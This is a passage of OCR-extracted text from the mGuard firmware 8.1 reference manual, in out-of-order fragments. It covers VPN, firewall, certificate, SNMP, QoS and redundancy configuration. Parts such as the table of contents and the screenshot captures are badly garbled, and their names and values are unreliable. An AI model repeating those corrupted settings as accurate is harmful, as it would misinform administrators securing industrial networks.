33. In both cases the connection to the Internet service provider and therefore the Internet is established via the telephone network using a modem or ISDN terminal adapter In Modem network mode the serial interface of the mGuard is not available for the PPP dial in option or for configuration purposes see Modem Console on page 139 After selecting Modem as the network mode specify the required parameters for the modem connection on the Dial out and or Dial in tab pages see Dial out on page 130 and Dial in on page 136 Enter the connection settings for an external modem on the Modem Console tab page see Modem Console on page 139 The configuration of the internal networks is described in the next section 1 In the case of the mGuard industrial rs with built in modem or ISDN terminal adapter Built in Modem is available as an option and in the case of mGuard rs4000 3G Built in mobile network modem is available as an option 105661_en_02 Innominate Security Technologies 129 mGuard 8 1 6 1 2 Dial out Only mGuard rs4000 3G mGuard rs4000 mGuard centerport mGuard industrial rs mGuard blade mGuard delta mGuard delta EAGLE mGuard Network Interfaces General Dial out Dial in Modem Console PPP dial out options Phone number to call ATD Authentication PAP X User name Password PAP server authentication No w Dialon demand Yes w idle timeout Yes w idle time seconds 300 LocalIP 0 0 0 0 Rem
34. Maximum table size 1024 254874 4056 Allow TCP connections upon SYN only after reboot connections need to be re established 4 Timeout for established TCP connections 432000 seconds Timeout for closed TCP connections seconds 3500 Abort existing connections upon firewall reconfiguration Yes FIP Wes RC Wes PPTP Wo H323 No SIP No OPC classic No Sanity check for OPC classic Yes w Timeout for OPC classic connection expectations seconds 1 Network Security gt gt Packet Filter gt gt Advanced Consistency checks Maximum size of Refers to the length of the entire packet including the header l l ping packets ICMP The packet length is normally 64 bytes but it can be larger If DA eA E nornen as Echo Request oversized packets are to be blocked to prevent bottlenecks in the scope of functions for the mGuard rs2000 3G mGuard rs2000 a maximum value can be specified This value should be more than 64 bytes in order not to block normal ICMP echo re quests 216 Innominate Security Technologies 105661_en_02 Network Security gt gt Packet Filter gt gt Advanced Network Modes Router PPTP PPPoE Stealth Mode 105661_en_02 Enable TCP UDP ICMP consistency checks Allow TCP keepalive packets without TCP flags ICMP via primary external interface for the mGuard ICMP via secondary external interface for the mGuard ICMP via DMZ for the mGuard A
35. Session Timeout seconds 1800 Management gt gt Web Settings gt gt General General Language If automatic is selected in the list of languages the device uses the language setting of the computer s browser Session Timeout Specifies the period of inactivity in seconds after which the seconds user will be automatically logged out of the mGuard web inter face Possible values 15 to 86400 24 hours 56 Innominate Security Technologies 105661_en_02 Management menu 4 2 2 Access Management Web Settings General lt Access HTTPS Web Access Allowed Networks Log ID tw nitos access N 262e7302 2040 1402 S076 0000D20650000 Se a a PP Log f 1 0 0 0 0 0 External w Accept v No v rd il 0 0 0 0 0 External w Accept v No v RADIUS Authentication Enable RADIUS authentication No User authentication User authentication method Login with X 509 client certificate or password w Only displayed VPN RootCA01 when Login with X 509 user certifi root V cate is selected X 509 Certificate Authorized for access as Battaglia Mauro v root v The mGuard must not be simultaneously configured via the web access shell access or SNMP Simultaneous configuration via the different access methods might lead to unex pected results When web access via HTTPS protocol is enabled the mGuard can be configured from a remote computer using its web based administrator interface This means
36. gt CIFS AV Scan Connector Allowed Networks 105661_en_02 Accessible as Server s workgroup Login Password Exported share s name Allow write access External Internal DMZ Displays the virtual network drive provided by the mGuard for the CIFS Antivirus Scan Connector function This path is displayed with UNC notation By means of copy and paste it can be directly used on the PC which is to use the virtual network drive see Accessing the virtual network CIFS Antivirus Scan Connector on page 245 Three UNC addresses for the internal and external interface and DMZ are displayed in Router network mode while one UNC address is displayed in Stealth network mode Access to the virtual network drive can be prevented as a re sult of the settings in the Allowed Networks section Enter a rule here accordingly especially if access via the external in terface is required Depending on the mGuard configuration further access op tions can be established over other IP addresses such as ac cess via VPN channels or via incoming calls for dial in see Dial in on page 136 Name of the CIFS server workgroup Login for the server Password for login Name for the computers that are to use the CIFS server to ac cess the combined drives The drives are connected under this name No read only access Yes read and write access These rules allow external access to the CIFS se
37. gt Connections gt gt Edit gt gt IKE Options Perfect Forward Method for providing increased security during data transmis Secrecy PFS sion With IPsec the keys for data exchange are renewed at defined intervals With PFS new random numbers are negotiated with the part ner instead of being derived from previously agreed random numbers The partner must have the same entry We recommend acti vation for security reasons a Select Yes if the partner supports PFS Set Perfect Forward Secrecy PFS to No if the partner is an IPsec L2TP client Lifetimes and Limits The keys of an IPsec connection are renewed at defined intervals in order to increase the difficulty of an attack on an IPsec connection ISAKMP SA Lifetime Lifetime in seconds of the keys agreed for ISAKMP SA De fault setting 3600 seconds 1 hour The maximum permitted lifetime is 86400 seconds 24 hours IPsec SA Lifetime Lifetime in seconds of the keys agreed for IPsec SA Default setting 28800 seconds 8 hours The maximum per mitted lifetime is 86400 seconds 24 hours IPsec SA Traffic Limit 0 to 2147483647 bytes The value O indicates that there is no traffic limit for the IPsec SAs on this VPN connection All other values indicate the maximum number of bytes which are encrypted by the IPsec SA for this VPN connection Hard Limit Re key Margin for Life Applies to ISAKMP SAs and IPsec SAs Umos Minimum duration before the old key expires
38. gt gt Interfaces gt gt General Network Status External IP address Display only the addresses via which the mGuard can be ac cessed by devices from the external network They form the interface to other parts of the LAN or to the Internet If the tran sition to the Internet takes place here the IP addresses are usually assigned by the Internet service provider ISP If an IP address is assigned dynamically to the mGuard the currently valid IP address can be found here In Stealth mode the mGuard adopts the address of the locally connected computer as its external IP Active Defaultroute via Display only the IP address that the mGuard uses to try to reach unknown networks is displayed here This field can con tain none if the mGuard is in Stealth mode Used DNS servers Display only the names of the DNS servers used by the mGuard for name resolution are displayed here This informa tion can be useful for example if the mGuard is using the DNS servers assigned to it by the Internet service provider Internal modem Displays the status of the internal modem mobile network modem of the mGuard rs4000 rs2000 3G and the internal an alog modem for the mGuard industrial rs 106 Innominate Security Technologies 105661_en_02 Network gt gt Interfaces gt gt General Network Mode Network Mode Router Mode Only used when Router is selected as the net work mode 1 105661_en_02 Network menu S
39. i Profile External Config Storage ECS Current state of the ECS Mot present Save the current ST perro See The root password to save to the ECS Automatically save configuration changes to an No ECS Encrypt the data on the ECS No configuration from ECS during il You can save the settings of the mGuard as a configuration profile under any name on the mGuard It is possible to create multiple configuration profiles You can then switch between different profiles as required for example if the mGuard is used in different environments Furthermore you can also save the configuration profiles as files on your configuration com puter Alternatively these configuration files can be loaded onto the mGuard and activated In addition you can restore the Factory Default settings at any time Certain models also allow the configuration profiles to be stored on external configuration storage ECS SD card mGuard rs4000 rs2000 3G mGuard rs4000 rs2000 mGuard delta mGuard pci SD mGuard pcie SD V 24 USB memory stick EAGLE mGuard mGuard centerport See Profiles on an external storage medium on page 78 When a configuration profile is saved the passwords used for authenticating administra tive access to the mGuard are not saved It is possible to load and activate a configuration profile that was created under an older firmware version However the reverse is not true a configuration pr
40. means of corresponding firewall rules for example by specifying Drop as an action Accept means that the data packets may pass through Reject means that the data packets are sent back and the sender is informed of their rejection In Stealth mode Reject has the same effect as Drop Drop means that the data packets are not permitted to pass through They are discarded which means that the sender is not informed of their whereabouts Freely selectable comment for this rule For each individual rule you can specify whether the use of the rule Should be logged set Log to Yes Should not be logged set Log to No default settings No this network drive is not mirrored Yes this network drive is mirrored and made available Name of the network drive to be imported created under C FS Integrity Monitoring gt gt Importable Shares gt gt Edit The content of the included drive is located in this directory External 2 and Dial in are only for devices with a serial interface see Network gt gt Interfaces on page 105 105661_en_02 105661_en_02 CIFS Integrity Monitoring menu Accessing the virtual network CIFS Antivirus Scan Connector The virtual network drive provided by the mGuard for the CIFS Antivirus Scan Connector can be integrated in Windows Explorer To do this open the Tools Map Network Drive menu in Windows Explorer and enter the path using UNC notation This path is
41. of ambiguity the URL call only affects the first entry in the list of connections It is not possible to communicate with the individual channels of a VPN connection If indi vidual channels are deactivated they are not started Starting and stopping in this way thus has no effect on the settings of the individual channels i e the list under Transport and Tunnel Settings Starting and stopping a connection using a URL only makes sense if the connection is de activated in the configuration or if Connection startup is set to Stopped Otherwise the mGuard re establishes the connection automatically Innominate Security Technologies 255 mGuard 8 1 If the status of a VPN connection is queried using the URL specified above then the follow ing responses can be expected Table 10 1 Status of a VPN connection A VPN connection with this name does not exist void The connection is inactive due to an error e g the external network is down or the host name of the partner could not be resolved in an IP address DNS The response void is also issued by the CGI interface even if no error oc curred If for example the VPN connection is deactivated according to the configuration No set in column and has not been enabled temporarily using the CGI interface or CMD contact ready The connection is ready to establish channels or allow incoming queries re garding channel setup At least one channel has already
42. 10 2 5 IKE Options IPsec VPN menu 105661 _en_02 IPsec VPN Connections Berlin Blomberg IKE Options ISAKMP SA Key Exchange 3DES ference list starts with the most ii preferred pair of aigorihms T x Alalgorithms w IPsec SA Data Exchange This preference list starts with the most wernei aae F r Perfect Forward Secrecy PFS Activation is recommended due to security reasons Lifetimes and Limits ISAKMP SA Lifetime 3600 seconds IPsec SA Lifetime 28800 seconds IPsec SA Traffic Limit 0 bytes Re key Margin for Lifetimes Applies to ISAKMP SAs and IPsec SAS 540 cr Re key Margin for the Traffic Limit o bytes Applies to IPsec SAs only Re key Fuzz Applies to all re key margins Keying tries 0 means unlimited tries 0 Rekey Yes v 100 Dead Peer Detection Delay between requests for a sign of life 30 seconds Timeout for absent sign of life after which peer is assumed dead 120 All algorithms X PRA L Eepo n 3DES All algorithms w Innominate Security Technologies 279 mGuard 8 1 IPsec VPN gt gt Connections gt gt Edit gt gt IKE Options ISAKMP SA Key Algorithms Exchange Decide on which encryption method should be used with the administrator of the partner Encryption 3DES 168 is the most commonly used method and is there fore set by default Fundamentally the following applies the more bits an encryp tion alg
43. 1500 bytes often set by DSL it is recommended that a value of 1414 bytes be set This also allows enough space for additional headers If you want to use this option specify a value lower than the default setting 10 1 2 DynDNS Monitoring IPsec VPN Global Options DynDNS Monitoring DynDNS Monitoring Watch hostnames of remote i y VPN Gateways Refresh Interval sec 300 For an explanation of DynDNS see DynDNS on page 160 IPsec VPN gt gt Global gt gt Options DynDNS Monitoring Watch hostnames of Yes No a VENAE If the mGuard has the address of a VPN partner in the form of a host name see Defining a new VPN connection VPN con nection channels on page 255 and this host name is regis tered with a DynDNS service then the mGuard can check the relevant DynDNS at regular intervals to determine whether any changes have occurred If so the VPN connection will be established to the new IP address Refresh Interval sec Default 300 105661_en_02 Innominate Security Technologies 253 mGuard 8 1 Requirements for a VPN connection 254 10 2 IPsec VPN gt gt Connections Innominate Security Technologies A general requirement for a VPN connection is that the IP addresses of the VPN partners are known and can be accessed mGuards provided in stealth network mode are preset to the multiple clients stealth configuration In this mode you need to configure a management IP address and d
44. 2011 Connectivity Check External Interface The check is successful Wed Nov 9 11 59 06 CET 2011 Connectivity Check Internal Interface The check is successful Wed Oct 26 15 49 17 CEST 2011 Phrase Swap Controller Availability Check s Phrase The configured phrase is in use Wed Oct 26 15 49 20 CEST 2011 Phrase Swap Controller Phrase of the Encrypted State Synchronization The configured phrase is in use Wed Oct 26 15 49 19 CEST 2011 State Replication Connection Tracking Table The database is up to date Wed Nov 9 11 59 13 CET 2011 State Replication IPsec VPN Connections The database is up to date Wed Nov 9 11 59 13 CET 2011 Virtual Interface Controller Virtual Interface s Forwarding of traffic is allowed Wed Nov 9 11 59 06 CET 2011 State History A o empa anene kta E E A eae t s Wed Nov 9 11 59 13 CET 2011 Additionally the mGuard waits for a restarting component active on The mGuard is actively fi ing and miai k traffic t s u Wed Nov 9 11 59 06 CET 2011 active a mo ly fi koam k traffi t s u Wed Nov 9 11 59 06 CET 2011 becomes_active a oai ees t s u Wed Nov 9 11 59 06 CET 2011 The mG co st t s u Wed Nov 9 11 59 06 CET 2011 outdated The mGuard has an empty or outdated firewall or VPN state information which it wants to re synchronze Sea soviet ao faulty The mGuard does not yet have proper connectivity or cannot determine it for sure Ela eS ee ee ee active The mGuard is actively forwarding and fi
45. 2015 Innominate Security Technologies AG Innominate document number UG208102814 053 Innominate Security Technologies t FANG DaS Foederis E EE R E 11 1 1 Basic properties of the mGuardS ccccccsseececeeeseeceeeeeeeeeeaeeeeceeseeessenseeeseaaes 11 1 2 Typical applicathonmscenalio Sese E 13 1 2 1 Stealth mode Plug n Protect ccccseccecssseeeeceeeeeeceeeeeeeeseaeeeeenseeeeeens 13 1 2 2 NEIWOIK TOUET oirinn nn EO 14 1 293 PI EEE E N EIE PEI PEE FEE TEATE E EE 15 1 2 4 VPN GAO WAY aien ee n e A AO 15 1 2 5 WEAN Via VP N oere e a or een ee Ore eee ee ee 16 1 2 6 Resolving network conflicts ccccccecseeeeeeeceeeseeeeeeeaeaeeeeeeseaaseeeeeeeaas 17 2 GONCOURT tr Nerneien aera ene ee eens ene eae en ae cee eee eee 19 2 1 SUIbADIG DIOWSENS anena E 19 2 2 WIS ON FOIGS nie E a Sy seneauatect a 19 2 3 Input help during configuration system MESSAGES cccccseeeeeecseeeeeeeeeeeeaaees 20 2 4 Using the Web InteniaCe is chertine idee a teat E 21 2 5 CIDR Classless Inter Domain Routing c cseececeeeeeeceeeeeeeeeseeeeeeeseeeesessaeeess 24 2 6 Network example GiaQraim ccceeesececeeeeeeeneenereeeeaneeeeneaeeesenaaereseaaeeeenaeeneeesaes 25 3 Changes Compared to the previous version cccccecccceeeeeceseeceececeecesseeeeseeeessaeeeseeeesaeesseeeeas 27 3 1 Overview of modifications in version 8 1 cccccceseeeeceeeeeeeceaeeeeeecseeeeeeseeeesessaseees 27 3 1 1 User firewall
46. 3b 7c 4c 64 90 bf ff 8e The subject distinguished name or subject for short uniquely identifies the certificate owner The entry consists of several components These are known as attributes see the example certificate above The following table contains a list of possible attributes The se quence of attributes in an X 509 certificate can vary Table 17 1 X 509 Certificate Abbreviation Name Explanation Common name Identifies the person or object to whom or which the certificate belongs Example CN server1 E mail address Specifies the e mail address of the cer tificate owner nization or company Example O Development Organization Specifies the organization or company Organizational unit Specifies the department within an orga Example O Innominate Innominate Security Technologies 361 mGuard 8 1 NAT Network Address Translation Port number Proxy Table 17 1 X 509 Certificate Abbreviation Name Explanation L Locality Specifies the place locality Example L Hamburg C ST State Specifies the state or county Example ST Bavaria Country Two letter code that specifies the coun try Germany DE Example C DE A filter can be set for the subject i e the certificate owner during VPN connections and re mote service access to the mGuard using SSH or HTTPS This would ensure that only cer tificates from partners are accepted that have certain attributes in the subject line N
47. 65535 to the IP addresses These distin guish the various services offered by the protocols A number of additional protocols are based on UDP and TCP These include HT TP Hyper Text Transfer Protocol HTTPS Secure Hyper Text Transfer Protocol SMTP Simple Mail Transfer Protocol POP3 Post Office Protocol Version 3 and DNS Domain Name Ser vice ICMP is based on IP and contains control messages SMTP is an e mail protocol based on TCP IKE is an IPsec protocol based on UDP ESP is an IPsec protocol based on IP On a Windows PC the WINSOCK DLL or WSOCK32 DLL provides a common interface for both protocols Datagram on page 358 A VLAN Virtual Local Area Network divides a physical network into several independent logical networks which exist in parallel Devices on different VLANs can only access devices within their own VLAN Accordingly assignment to a VLAN is no longer defined by the network topology alone but also by the configured VLAN ID VLAN settings can be used as optional settings for each IP A VLAN is identified by its VLAN ID 1 4094 All devices with the same VLAN ID belong to the same VLAN and can there fore communicate with each other The Ethernet packet for a VLAN according to IEEE 802 1Q is extended by 4 bytes with 12 bits available for recording the VLAN ID VLAN IDs 0 and 4095 are reserved and cannot be used for VLAN identification 364 Innominate Security Techn
48. COM Server Baudrate and Handshake the Serial Console settings are used The RFC 2217 Server is initialized with the same serial settings as the RAW ver COM Server Allowed Networks Log ID fw comserver access N 3c7 adc93 1420 103f 9332 000cbe000566 Esco aerae ton comment hog 1 0 0 0 0 0 External w Accept w Yes w Network gt gt Interfaces gt gt Modem Console mGuard platforms with serial interface COM server 105661_en_02 Type Here you can select the way that the COM server should op erate Possible options are RFC 2217 RAW client RAW server Local Port Defines the port that the COM server should respond to Is available when the type is set to RFC 2217 or RAW server Values 1 65535 Default 3001 Remote IP address Defines the remote IP address of a RAW client Is available when the type is set to RAW client Default 10 1 0 254 Innominate Security Technologies 143 mGuard 8 1 Network gt gt Interfaces gt gt Modem Console mGuard platforms with serial interface Remote Port Defines the port to which the RAW client sends the data Is available when the type is set to RAW client Values 1 65535 Default 3001 Serial parameters Defines the parity and stop bits for the serial interface The general packet length of the serial interface is 8 bits 1 stop bit no parity default 1 stop bit even parity 1 stop bit odd parity 2 stop bits no parity 2 stop bits even
49. CRLs in order to use them Certificates are only checked for revocations if the Enable CRL checking option is set to Yes see Certificate settings on page 195 ACRL with the same issuer name must be present for each issuer name specified in the certificates to be checked If such a CRL is not present and CRL checking is enabled the certificate is considered invalid Issuer Information read directly from the CRL by the mGuard Shows the issuer of the relevant CRL Last Update Information read directly from the CRL by the mGuard Time and date of issue of the current CRL on the mGuard Next Update Information read directly from the CRL by the mGuard Time and date when the CA will next issue a new CRL This information is not influenced or considered by the CRL download interval URL Specify the URL of the CA where CRL downloads are ob tained if the CRL should be downloaded on a regular basis as defined under CRL download interval on the Certificate set tings tab page see Certificate settings on page 195 Download via VPN if If set to Yes the mGuard uses a VPN tunnel to access the applicable URL where the CRL is available for download For this to hap pen a suitable VPN tunnel must be configured activated and allow access Otherwise the CRL downloads from this URL will not be forwarded via a VPN tunnel 105661_en_02 Innominate Security Technologies 203 mGuard 8 1 Authentication gt gt Certificates gt g
50. Certificate Data Version 3 0x2 Serial Number 1 0x1 Signature Algorithm md5WithRSAEncryption Issuer C XY ST Austria L Graz O TrustMe Ltd OU Certificate Authority CN CA Email ca trustme dom Validity Not Before Oct 29 17 39 10 2000 GMT gt Subject CN anywhere com E doctrans de C DE ST Hamburg L Hamburg O Innominate OU Security Subject Public Key Info Public Key Algorithm rsaEncryption RSA Public Key 1024 bit Modulus 1024 bit 00 c4 40 4c 6e 14 1b 61 36 84 24 b2 61 c0 b5 d7 e4 7a a5 4b 94 ef d9 5e 43 7f c1 64 80 fd 9f 50 41 6b 70 73 80 48 90 f3 58 bf f0 4c b9 90 32 81 59 18 16 3f 19 f4 5f 11 68 36 85 f6 1c a9 af fa a9 a8 7b 44 85 79 b5 f1 20 d3 25 7d 1 de 68 15 0c b6 bc 59 46 0a d8 99 4e 07 50 0a 5d 83 61 d4 db c9 7d c3 2e eb 0a 8F 62 8f 7e 00 e1 37 67 3f 36 d5 04 38 44 44 77 e9 f0 b4 95 f5 f9 34 9F f8 43 Exponent 65537 0x10001 X509v3 extensions X509v3 Subject Alternative Name email xyz anywhere com Netscape Comment mod_ssl generated test server certificate Netscape Cert Type SSL Server Signature Algorithm md5WithRSAEncryption 12 ed f7 b3 5e a0 93 3f a0 1d 60 cb 47 19 7d 15 59 9b 3b 2c a8 a3 6a 03 43 d0 85 d3 86 86 2f e3 aa 79 39 67 82 20 ed f4 1 1 85 a3 41 5e 5c 8d 36 a2 71 b6 6a 08 f9 cc 1e da c4 78 05 75 8f 9b 1 0 f0 15 f0 9e 67 a0 4e a1 4d 3f 16 4 c 9b 19 56 6a f2 af 89 54 52 4a 06 34 42 0d d5 40 25 6b b0 c0 a2 03 18 cd d1 07 20 b6 e5 c5 1e 21 44 e7 05 09 d2 d5 94 9d 6c 13 07 2f
51. Control gt gt OvemileW siisaren smir iina a N Ti 101 Blade Control gt gt Blade 01 to 1 2 esserscacsiy ce racestavataveieaiecebsccussaesaucoctiAncovencesigeuntes 102 5 2 1 Blade im SlO i sneen ea a a a seen canteen 102 5 2 2 COMMGUNAUON riesia EENS 103 E E E A A ae 105 Network gt INI6MaCES ascii n a e eda anarap eee 105 6 1 1 General err eee ee a a 106 6 1 2 DIAOUL asiaasi teneteven Cecacnses Satecntdeeta cert eactenaa tee 130 6 1 3 PAA eiscet disci cxshet anand sbch tran a a 136 6 1 4 Modem Console vi cc si despacenassosteccetesaandssdloaadeaneseteaetiaexenostuazaacace aateanees 139 Network gt gt Ethernet caeron ae E A Oa a 148 6 2 1 MASONDO S ar a tate ate cte a cewned 148 6 2 2 Mullicas Eize ta ieee a a enaeean ins cans spun eaieateinent acute aere 150 6 2 3 EAIOUNICE fastanccagcetescnn sscaatocmeen E E OE 151 INGIWOFK S SINAN carina ee Sica Sec esd nests Seen eae Annes ele teatene 152 6 3 1 MASCQUCTACING sissien a la lveeuaavanet 152 6 3 2 PANG Port Forwarding sesenta a a AE e R 155 NEtWWOIK gt DN See a O N E E ONE 157 6 4 1 PNS SENO naa siete anetteena te eerecsiene deuce oetueecenutaues 157 6 4 2 PV tel Nos paced trae anes caw asansnteaa a O 160 Network gt gt Ie G Scag tee eer eee eee ee eee ee nee ree eee eae eee eee eee 162 6 5 1 Internal Extermal DHCP Sf sncAviiiiee sensei densi aes dee TE 162 NetWork gt FIO Settings es RA S 167 6 6 1 HTTP S Proxy Settings cccccccsseeccccseeeeccseeeeeceseeeceeaseee
52. DE Subject Alternative Names Issuer CN VPN SubCA 01 0 Beispiel Lieferant C DE Validity From Mar 20 18 33 09 2007 GMT to Mar 20 18 33 09 2010 GMT Fingerprint MDS 11 73 7D 98 89 6F AB DB 23 A1 22 06 A2 68 79 EC SHA1 9 14 0A 50 84 36 62 C5 B0 2F 1F A7 FB 1E 89 47 30 53 BC B8 Filename pem Durchsuchen_ VPN Identifier Local Valid values are the certificates distinguished name Same as no entry Remote Valid values are the certificates distingushed name Same as no entry IPsec VPN gt gt Connections gt gt Edit gt gt Authentication Authentication Authentication There are two options method X 509 Certificate default Pre shared Secret PSK Depending on the chosen method the page contains different setting options Authentication method X 509 Certificate This method is supported by most modern IPsec implementa tions With this option each VPN device has a secret private key and a public key in the form of an X 509 certificate which contains further information about the certificate s owner and the certification authority CA The following must be specified How the mGuard authenticates itself to the partner How the mGuard authenticates the remote partner How the mGuard authenticates itself to the partner Authentication method X 509 Certificate v Local X 509 Certificate VPN Endpunkt Kundendienst MA w Remote CA Certificate No CA certificate but the Remote Certificate be
53. IGuard Firmware 8 1 Configuration of the mGuard Security Appliances Software Reference Manual Innominate Security Technologies Software Reference Manual mGuard Firmware 8 1 Designation UM EN MGUARD 8 1 Revision 02 Order No 2015 01 27 This user manual is valid for the mGuard software release 8 1 when using devices of the mGuard product range mGuard rs4000 3G mGuard rs2000 3G mQ Guard rs4000 mQGuard rs2000 mGuard centerport mQGuard industrial rs mGuard smart MGuard smart mGuard pci SD mGuard pcie SD mQ Guard blade mGuard delta mQ Guard delta EAGLE mGuard Innominate Security Technologies 105661_en_02 Please observe the following notes Target group of this user manual The use of products described in this user manual is aimed solely at Qualified electricians or persons instructed by them who are familiar with applicable standards and other regulations regarding electrical engineering and in particular the relevant safety concepts Qualified application programmers and software engineers who are familiar with the safety concepts of automation technology as well as applicable standards and other regulations Explanation of symbols used and signal words This symbol indicates hazards that could lead to personal injury Obey all safety measures that follow this symbol to avoid possible injury or death There
54. Medium v Low v High v Medium w Medium wv Low v 298 Innominate Security Technologies 105661_en_02 QoS menu VPN via Dial in settings for egress queues QoS Egress Queues VPN VPN via Internal VPN via External VPN via External 2 VPN via Dial in Enabling Enable Egress QoS No vw Total Bandwidth Rate Bandwidth Rate Limit unlimited Queues p 4 Urgent unlimited High v F 2 3 Default unlimited Medium w 4 i Important unlimited Medium wv Low Priority unlimited Low v All of the tab pages listed above for Egress Queues for the Internal External External 2 and Dial in interfaces and for VPN connections routed via these interfaces have the same set ting options In all cases the settings relate to the data that is sent externally into the network from the relevant mGuard interface QoS menu gt gt Egress Queues gt gt Internal External External 2 Dial in QoS menu gt gt Egress Queues VPN gt gt VPN via Internal VPN via External VPN via External 2 VPN via Dial in Enabling Enable Egress QoS No default this feature is disabled Yes this feature is enabled This option is recommended if the interface is connected to a network with low bandwidth This enables bandwidth allocation to be influenced in favor of par ticularly important data Total Bandwidth Rate Bandwidth Rate Limit kbps or Packet s Total maximum bandwidth that is physically available
55. Password changes for one of the predefined users root admin netadmin audit and user 105661_en_02 Innominate Security Technologies 183 mGuard 8 1 Authentication gt gt Administrative Users gt gt RADIUS Filters RADIUS Filters for Adminis Group Filter ID The group name may only be used once Two lines must not trative Access have the same value Answers from the RADIUS server with a notification of suc cessful authentication must have this group name in their filter ID attribute Up to 50 characters are allowed printable UTF 8 characters only without spaces Authorized for access Each group is assigned an administrative role a3 admin Administrator netadmin Administrator for the network audit Auditor The netadmin and audit authorization levels relate to access rights with the mGuard device manager 184 Innominate Security Technologies 105661_en_02 Authentication menu 7 2 Authentication gt gt Firewall Users To prevent private surfing on the Internet for example every outgoing connection is blocked under Network Security gt gt Packet Filter gt gt DMZ VPN is not affected by this Under Network Security gt gt User Firewall different firewall rules can be defined for certain users e g outgoing connections are permitted This user firewall rule takes effect as soon as the relevant firewall user s to whom this user firewall rule applies has or have logged in see Network Security
56. Patterns Name Freely definable name for a set of rules for the files to be checked This name must be selected under CIFS Integrity Monitor ing gt gt CIFS Integrity Checking gt gt Settings gt gt Edit in order for the sample to be activated Click on Edit to define a set of rules for the files to be checked and save this under the defined name CIF S Integrity Monitoring CIF S Integrity Checking For C Set of Filename Patterns aS Rules for files to check x system volume information Exclude w p jeyvilkexjvxco Exclude w pF factoryrecovery Exclude w Fr Srecycle bin Exclude F pagefile sys Exclude w p pagefile sys Exclude w pF m t exe include w p t com include w dil Include Fo bat Include v p cmd Include w CIFS Integrity Monitoring gt gt CIFS Integrity Checking gt gt Set of Filename Patterns gt gt Edit Rules for files to check Filename pattern The following rules apply 240 A exe means that the files located in a specific directory and with file extension exe are checked or excluded Only one wildcard is permitted per directory or file name Wildcards represent characters e g win exe returns files with the extension exe that are located in a directory that be gins with win atthe start means that any directory is searched even those at the top level if this is empty This cannot be combined with other char
57. Security Technologies Activate traps Yes No enterprise oid mGuardTraplndustrial generic trap enterpriseSpecific specific trap mGuardTrapIndustrialT emperature 1 additional mGuardSystemTemperature mGuardTrapIndustrialT empHiLimit mGuardTrapIndustrialLowLimit The trap indicates the temperature in the event of the temper ature exceeding the specified limit values mGuardTrapIndustrial enterpriseSpecific mGuardTrapAutoConfigAdapterState 4 mGuardTrapAutoConfigAdapter Change enterprise oid genericTrap specific trap additional This trap is sent after access to the ECS Blade switch failure activate traps Yes No enterprise oid mGuardTrapBladeCTRL generic trap enterpriseSpecific specific trap mGuardTrapBladeCitrlPowerStatus 2 additional mGuardTrapBladeRackID mGuardTrapBladeSlotNr mGuardTrapBladeCtrlPowerStatus This trap is sent when the power supply status of the blade pack changes mGuardTrapBladeCTRL enterpriseSpecific mGuardTrapBladeCtrlRunStatus 3 mGuardTrapBladeRackID mGuardTrapBladeSlotNr mGuardTrapBladeCtrlRunStatus This trap is sent when the blade run status changes enterprise oid generic trap specific trap additional Backup restore activate traps Yes No enterprise oid mGuardTrapBladeCirlCfg generic trap enterpriseSpecific specific trap mGuardTrapBladeCt
58. The configuration page containing the firewall rule that the log entry refers to is dis played Blade In addition to error messages the following messages are output on the mGuard blade con troller The areas enclosed by lt and gt are replaced by the relevant data in the log entries blade daemon lt version gt starting Blade lt bladenr gt online Blade lt bladenr gt is mute Blade lt bladenr gt not running Reading timestamp from blade lt bladenr gt Push configuration to blade lt bladenr gt recontiguration of blade lt bladenr gt returned lt returncode gt blade lt bladenr gt lt text gt Pull configuration from blade lt bladenr gt Pull configuration from blade lt bladenr gt returned lt returncode gt Innominate Security Technologies 325 mGuard 8 1 CIFS AV Scan Connector This log contains CIFS server messages This server is used by the mGuard itself for share purposes In addition messages that occur when connecting the network drives and are grouped to gether and provided by the CIFS server are also visible CIFS Integrity Checking Messages relating to the integrity check of network drives are displayed in this log In addition messages that occur when connecting the network drives and are required for the integrity check are also visible DHCP server relay Messages from the services defined under Network gt DHCP SNMP LLDP Messages from services defined
59. The mGuard may receive VPN connections encapsulated in TCP even when it is posi tioned behind a NAT gateway in the network and thus cannot be reached by the VPN part ner under its primary external IP address To do this the NAT gateway must forward the cor responding TCP port to the mGuard see Listen for incoming VPN connections which are encapsulated on page 251 TCP encapsulation can only be used if an mGuard Version 6 1 or later is used at both ends of the VPN tunnel TCP encapsulation should only be used if required because connections are slowed down by the significant increase in the data packet overhead and by the correspondingly longer processing times If the mGuard is configured to use a proxy for HTTP and HTTPS in the Network gt gt Proxy Settings menu item then this proxy is also used for VPN connections that use TCP en capsulation TCP encapsulation supports the basic authentication and NTLM authentication methods for the proxy For the TCP encapsulation to work through an HTTP proxy the proxy must be named ex plicitly in the proxy settings Network gt gt Proxy Settings menu item i e it must not be a transparent proxy and this proxy must also understand and permit the HTTP method CONNECT TCP encapsulation does not work in connection with authentication via pre shared key PSK 250 Innominate Security Technologies 105661_en_02 IPsec VPN menu As devices in the TCP encapsulation the m
60. VPN partners To register its IP address with a DynDNS service Tosend SNMP traps To forward log messages to a SysLog server To download a CRL from an HTTP S server To authenticate a user through a RADIUS server To download a configuration profile through an HTTPS server To download a firmware update from an HTTPS server With firewall redundancy in Router network mode devices connected to the same LAN seg ment as the redundant pair must use their respective virtual IP addresses as gateways for their routes If these devices were to use the actual IP address of either of the mGuard de vices this would work until that particular mGuard failed However the other mGuard would then not be able to take over 340 Innominate Security Technologies 105661_en_02 Redundancy Targets for the connectivity check If a target is set for ICMP echo requests as part of the connectivity check these requests must be answered within a certain time even if the network is busy with other data The net work path between the redundant pair and these targets must be set so that it is also able to forward the ICMP responses when under heavy load Otherwise the connectivity check for an mGuard could erroneously fail Targets can be configured for the internal and external interface in the connectivity check see Connectivity Checks on page 313 It is important that these targets are actually con nected to the specifi
